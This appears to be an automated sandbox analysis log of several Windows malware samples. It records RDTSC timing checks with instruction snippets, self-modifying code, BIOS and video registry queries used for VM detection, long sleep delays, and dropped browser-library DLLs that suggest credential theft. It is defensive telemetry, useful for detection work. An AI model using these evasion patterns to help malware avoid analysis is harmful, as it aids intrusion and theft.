Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EEF4BE second address: EEF4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EEF4C3 second address: EEF4C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EFF5B2 second address: EFF5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EFF6F4 second address: EFF6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EFF6FA second address: EFF6FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EFFA28 second address: EFFA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F005B2 second address: F005D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F390h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F8C2504F386h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F0504D second address: F05051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F04D46 second address: F04D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8C2504F386h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F0D9BC second address: F0D9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F1307E second address: F1309B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F397h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F229A2 second address: F229B6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C24FD04C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F8C24FD04C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F229B6 second address: F229BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F313C9 second address: F313E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C24FD04D8h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31588 second address: F3159F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F8C2504F390h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F3171B second address: F31741 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F8C24FD04CEh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31741 second address: F31745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31A6B second address: F31A71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31A71 second address: F31A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31A7D second address: F31A81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31A81 second address: F31A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31A87 second address: F31A9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8C24FD04D1h 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31CFD second address: F31D06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31D06 second address: F31D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jc 00007F8C24FD04C6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31D1B second address: F31D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8C2504F386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31E4D second address: F31E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31E51 second address: F31E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31E59 second address: F31E5E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F31FA8 second address: F31FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F3655F second address: F3656D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F3656D second address: F36581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F365EB second address: F36602 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C24FD04D3h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F367E6 second address: F367EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F368D3 second address: F368E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F368E8 second address: F3693A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jns 00007F8C2504F390h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jnl 00007F8C2504F399h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jns 00007F8C2504F38Eh 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jl 00007F8C2504F388h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F3693A second address: F3693F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F37E85 second address: F37EBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Ah 0x00000007 jl 00007F8C2504F397h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8C2504F38Fh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8C2504F393h 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: F37EBF second address: F37ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C24FD04CCh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: 53203E1 second address: 53203F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: 532049F second address: 53204AA instructions: 0x00000000 rdtsc 0x00000002 mov dx, 099Eh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: 53204AA second address: 53204F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov bx, E750h 0x0000000c push ebx 0x0000000d mov dx, ax 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 push edi 0x00000016 pushfd 0x00000017 jmp 00007F8C2504F398h 0x0000001c sbb eax, 698F22C8h 0x00000022 jmp 00007F8C2504F38Bh 0x00000027 popfd 0x00000028 pop eax 0x00000029 push eax 0x0000002a push edx 0x0000002b mov dx, 886Ah 0x0000002f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Special instruction interceptor: First address: CA3C68 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Special instruction interceptor: First address: CA3D34 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Special instruction interceptor: First address: E5EBEB instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Special instruction interceptor: First address: EDEA13 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory allocated: 1850000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory allocated: 3260000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory allocated: 1900000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Memory allocated: 1130000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Memory allocated: 2D70000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Memory allocated: 1130000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Memory allocated: 1150000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Memory allocated: 2E50000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Memory allocated: 12D0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Memory allocated: 1770000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Memory allocated: 3210000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Memory allocated: 30D0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory allocated: 770000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory allocated: 22B0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory allocated: 21F0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory allocated: 2180000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory allocated: 2440000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory allocated: 2180000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory allocated: 15D0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory allocated: 33E0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory allocated: 31E0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory allocated: 12A0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory allocated: 2CC0000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory allocated: 2BC0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 1110000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2D50000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2B50000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 25B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2730000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 4730000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 1B60000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 3800000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 1D90000 memory reserve | memory write watch
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 945
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\libeay32.dll (copy)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\is-2Q3FJ.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\is-EAF0N.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\lnef[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\ssleay32.dll (copy)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\filename.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\userJJJJDAAECG.exe
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_setup64.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\libssl-1_1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\is-KRTJG.tmp
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[2].dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_shfoldr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\is-9IS1N.tmp
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe API coverage: 3.5 %
Source: C:\Users\user\Desktop\gobEmOm5sr.exe TID: 7504 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\gobEmOm5sr.exe TID: 7520 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7540 Thread sleep count: 51 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660 Thread sleep count: 335 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660 Thread sleep time: -67000s >= -30000s
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe TID: 1860 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe TID: 5344 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe TID: 7520 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe TID: 7684 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe TID: 7256 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5576 Thread sleep count: 52 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5576 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 3616 Thread sleep count: 44 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 3616 Thread sleep time: -88044s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5084 Thread sleep count: 51 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5084 Thread sleep time: -102051s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 6112 Thread sleep count: 56 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 6112 Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 8100 Thread sleep count: 62 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 8100 Thread sleep time: -372000s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 6048 Thread sleep count: 45 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 6048 Thread sleep time: -90045s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5312 Thread sleep count: 48 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5312 Thread sleep time: -96048s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5568 Thread sleep count: 52 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5568 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 4828 Thread sleep count: 47 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 4828 Thread sleep time: -94047s >= -30000s
